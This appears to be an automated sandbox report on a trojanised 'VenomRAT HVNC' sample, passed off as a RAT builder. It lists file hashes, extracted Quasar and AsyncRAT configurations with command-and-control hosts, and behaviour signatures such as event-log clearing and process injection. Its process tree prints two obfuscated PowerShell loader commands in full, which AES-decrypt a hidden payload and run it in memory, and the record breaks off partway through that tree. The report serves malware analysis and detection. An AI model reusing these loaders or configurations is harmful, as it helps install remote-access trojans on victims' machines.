Overview

overview

10

Static

static

10

VenomRAT-V...NC.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    107s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07-01-2025 19:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    VenomRAT-V5.6-HVNC/Venom RAT + HVNC.exe

  • Size

    15.5MB

  • MD5

    c9a19172aec8f4d35aabe33d2123d53c

  • SHA1

    24f5dc16f84b7096d2561b628ee22e4aa3fb65a3

  • SHA256

    51505fab78a7b318bcae9d3005fd3035517141abed16054541c29c03bb9af4ea

  • SHA512

    cde593b070d0ea9067651fe107099621c3e1351ad00cf1c641b211fbb4adb380fb83d7a6276cff1e11496f43fc776c603f12ee67aacf0effaf192b4a53199994

  • SSDEEP

    196608:IA5PPrnA5PPr3lAA5PPrJSe6PC7aIahLkNPFCZZwiJl1NLIsPA8fxvuIMzd/95Un:LebljNd60T7P+Zw6NLIsFfskh1BmXG

Score
10/10
asyncratquasarv15.4.1 | venomvenom clientsdefense_evasiondiscoveryratspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.4.1 | Venom

C2

dofucks.com:12482

private115.duckdns.org:12482
Mutex

adf10731-c83d-4166-9137-39d0b1e48856

Attributes
  • encryption_key

    C84CB6134701741C5122A14FACDB67C8CFA9C0AB

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

  • startup_key

    $sxr-seroxen

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

127.0.0.1:4448

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 28 IoCs
  • Async RAT payload 1 IoCs
    rat
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 24 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Loads dropped DLL 1 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 22 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 28 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 57 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1136
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{888903ce-d487-4c48-b852-959c65092ada}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1108
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4ba98a99-b161-41a9-88b4-d08a00caa83d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:740
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f6a75cb2-c623-4257-a929-c36b5486e3a7}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:520
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1e9fbac8-fbe6-4d40-ae76-3a09cf8a49ae}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4648
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{fdf9863d-a82f-4c81-b5b1-8ee840f5a36a}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1428
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8994e9bd-61c3-41c7-a30e-c0488187cb18}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:740
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e5b31b42-5540-466a-8153-a7ef69ec3fe7}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d2a93ec9-09bc-4159-bfa0-1e391d6db6a7}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3864
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{dc65c5cd-b2c9-4ad9-8daa-e2a3996465a4}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5184
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0cfc799f-c60f-4658-b2d5-9e91cdca86ea}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5212
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1f1a6315-aad5-4438-874d-74d8a34f3703}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5264
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2c1cc369-3bf8-4da0-90c9-8e2e9072ac9c}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5292
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{cc3a1be5-ddd0-4113-81bc-127deb64b6e9}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5300
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6b8aa2f1-ac81-46d9-92e7-98d60cfec7d7}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5328
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c0416aa1-af90-4856-97e6-546d52cee9ba}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4884
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6475a628-4bf9-4439-9942-a584c80ff022}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{bf64adee-3fca-43a7-a48c-a709dba79d11}
          2⤵
            PID:6424
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{997754c9-7801-4450-acd6-a4f0e558ccd3}
            2⤵
              PID:6444
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{8765ed8a-2622-47a3-92b3-d6d4496bcec0}
              2⤵
                PID:6564
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{6a82c38b-db69-4ac0-bfe9-b7e0f1e92246}
                2⤵
                  PID:6652
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{c915c86d-9530-4b87-a456-6930e1494437}
                  2⤵
                    PID:6676
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{c2e1f64e-4879-49e5-a1eb-7b439506d379}
                    2⤵
                      PID:6788
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{8a9de8df-bd88-4d85-8e1f-91f8c74b0d02}
                      2⤵
                        PID:6804
                      • C:\Windows\System32\dllhost.exe
                        C:\Windows\System32\dllhost.exe /Processid:{77c83c3c-6354-4660-94f7-87fc38072db0}
                        2⤵
                          PID:6892
                        • C:\Windows\System32\dllhost.exe
                          C:\Windows\System32\dllhost.exe /Processid:{ac9e1b21-c818-4cf1-a233-4f7d791bbd72}
                          2⤵
                            PID:6916
                          • C:\Windows\System32\dllhost.exe
                            C:\Windows\System32\dllhost.exe /Processid:{1dfe6016-df48-4c7d-8d7f-1f570e371e1d}
                            2⤵
                              PID:6980
                            • C:\Windows\System32\dllhost.exe
                              C:\Windows\System32\dllhost.exe /Processid:{ec6e7320-3d8f-49ed-bdc3-b55f8a0dc02c}
                              2⤵
                                PID:7004
                              • C:\Windows\System32\dllhost.exe
                                C:\Windows\System32\dllhost.exe /Processid:{4e48957f-edc6-4083-a436-5fa52b03d28b}
                                2⤵
                                  PID:5384
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:680
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                  1⤵
                                    PID:972
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                    1⤵
                                      PID:444
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                      1⤵
                                        PID:752
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                        1⤵
                                          PID:880
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          1⤵
                                          • Indicator Removal: Clear Windows Event Logs
                                          PID:1060
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          1⤵
                                            PID:1100
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                            1⤵
                                              PID:1144
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1264
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                1⤵
                                                  PID:1292
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                  1⤵
                                                    PID:1304
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                    1⤵
                                                      PID:1344
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                      1⤵
                                                      • Drops file in System32 directory
                                                      PID:1364
                                                      • C:\Windows\system32\taskhostw.exe
                                                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                        2⤵
                                                          PID:3124
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                        1⤵
                                                          PID:1552
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          1⤵
                                                            PID:1608
                                                            • C:\Windows\system32\sihost.exe
                                                              sihost.exe
                                                              2⤵
                                                                PID:2284
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                              1⤵
                                                                PID:1616
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                1⤵
                                                                  PID:1640
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                  1⤵
                                                                    PID:1656
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    1⤵
                                                                      PID:1816
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                      1⤵
                                                                        PID:1880
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                        1⤵
                                                                          PID:1912
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1924
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1936
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                              1⤵
                                                                                PID:1976
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                1⤵
                                                                                  PID:2028
                                                                                • C:\Windows\System32\spoolsv.exe
                                                                                  C:\Windows\System32\spoolsv.exe
                                                                                  1⤵
                                                                                    PID:2056
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                    1⤵
                                                                                      PID:2212
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                      1⤵
                                                                                        PID:2320
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                        1⤵
                                                                                          PID:2328
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:2368
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                          1⤵
                                                                                            PID:2472
                                                                                          • C:\Windows\sysmon.exe
                                                                                            C:\Windows\sysmon.exe
                                                                                            1⤵
                                                                                              PID:2512
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                              1⤵
                                                                                                PID:2540
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                1⤵
                                                                                                  PID:2576
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2588
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                    1⤵
                                                                                                      PID:2764
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                      1⤵
                                                                                                        PID:940
                                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2400
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                          1⤵
                                                                                                            PID:3220
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                            1⤵
                                                                                                              PID:3468
                                                                                                            • C:\Windows\Explorer.EXE
                                                                                                              C:\Windows\Explorer.EXE
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:3564
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe"
                                                                                                                2⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4444
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat" "
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:816
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    4⤵
                                                                                                                      PID:3608
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe
                                                                                                                      "ClientFix.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $WFMJi = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat').Split([Environment]::NewLine);foreach ($CfaZq in $WFMJi) { if ($CfaZq.StartsWith(':: ')) { $vvycE = $CfaZq.Substring(3); break; }; };$ebOVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($vvycE);$TvyrY = New-Object System.Security.Cryptography.AesManaged;$TvyrY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TvyrY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TvyrY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kAdRfGjG5nQ73DzFMdGHAl3pY8gtBNZSc1HkWv4kVjQ=');$TvyrY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XfTHUmFJqIl6NYYRvVi6Uw==');$iolsF = $TvyrY.CreateDecryptor();$ebOVF = $iolsF.TransformFinalBlock($ebOVF, 0, $ebOVF.Length);$iolsF.Dispose();$TvyrY.Dispose();$xwvRO = New-Object System.IO.MemoryStream(, $ebOVF);$KUalT = New-Object System.IO.MemoryStream;$sthnm = New-Object System.IO.Compression.GZipStream($xwvRO, [IO.Compression.CompressionMode]::Decompress);$sthnm.CopyTo($KUalT);$sthnm.Dispose();$xwvRO.Dispose();$KUalT.Dispose();$ebOVF = $KUalT.ToArray();$KGzdp = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ebOVF);$OfYbS = $KGzdp.EntryPoint;$OfYbS.Invoke($null, (, [string[]] ('')))
                                                                                                                      4⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4868
                                                                                                                      • C:\Windows\$sxr-powershell.exe
                                                                                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                        5⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Hide Artifacts: Hidden Window
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:1200
                                                                                                                        • C:\Windows\$sxr-powershell.exe
